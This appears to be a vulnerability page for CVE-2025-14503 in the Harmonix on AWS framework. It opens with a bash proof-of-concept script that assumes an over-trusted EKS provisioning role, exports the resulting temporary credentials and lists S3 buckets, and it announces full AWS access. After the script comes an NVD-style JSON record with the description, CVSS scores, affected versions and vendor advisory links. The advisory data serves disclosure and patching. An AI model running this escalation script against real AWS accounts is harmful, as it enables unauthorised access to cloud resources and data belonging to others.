CVE-2025-14503

#!/bin/bash # CVE-2025-14503 PoC - IAM Privilege Escalation via Role Assumption # Prerequisites: Valid AWS credentials with sts:AssumeRole permission in the same account TARGET_ROLE_ARN="arn:aws:iam::123456789012:role/harmonix-eks-provisioning-role" SESSION_NAME="attacker-session-$(date +%s)" # Step 1: Assume the target role with administrative privileges echo "[+] Attempting to assume target role: $TARGET_ROLE_ARN" CREDS=$(aws sts assume-role \ --role-arn "$TARGET_ROLE_ARN" \ --role-session-name "$SESSION_NAME" \ --duration-seconds 3600) if [ $? -eq 0 ]; then echo "[+] Successfully assumed role!" # Step 2: Extract credentials export AWS_ACCESS_KEY_ID=$(echo $CREDS | jq -r '.Credentials.AccessKeyId') export AWS_SECRET_ACCESS_KEY=$(echo $CREDS | jq -r '.Credentials.SecretAccessKey') export AWS_SESSION_TOKEN=$(echo $CREDS | jq -r '.Credentials.SessionToken') # Step 3: Verify privilege escalation echo "[+] Verifying escalated privileges..." aws iam simulate-principal-policy \ --policy-source-arn "arn:aws:iam::123456789012:role/harmonix-eks-provisioning-role" \ --action-names "*" \ --resource-arns "*" # Step 4: List S3 buckets or other sensitive resources echo "[+] Listing S3 buckets with escalated privileges..." aws s3 ls echo "[+] Privilege escalation successful! Full AWS access obtained." else echo "[-] Failed to assume role. Check permissions." fi

{"cve": {"id": "CVE-2025-14503", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2025-12-15T20:15:49.190", "lastModified": "2026-01-30T17:02:34.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An overly-permissive IAM trust policy in the Harmonix on AWS framework may allow IAM principals in the same AWS account to escalate privileges via role assumption. The sample code for the EKS environment provisioning role is configured to trust the account root principal, which may enable any IAM principal in the same AWS account with sts:AssumeRole permissions to assume the role with administrative privileges.\n\n\nWe recommend customers upgrade to Harmonix on AWS v0.4.2 or later if you have deployed the framework using versions v0.3.0 through v0.4.1."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:amazon:harmonix:*:*:*:*:*:aws:*:*", "versionStartIncluding": "0.3.0", "versionEndExcluding": "0.4.2", "matchCriteriaId": "DB22DB4B-8396-4C5E-9346-3E20EE111E99"}]}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-031/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://github.com/awslabs/harmonix/pull/189", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Issue Tracking"]}, {"url": "https://github.com/awslabs/harmonix/security/advisories/GHSA-qm86-gqrq-mqcw", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}]}}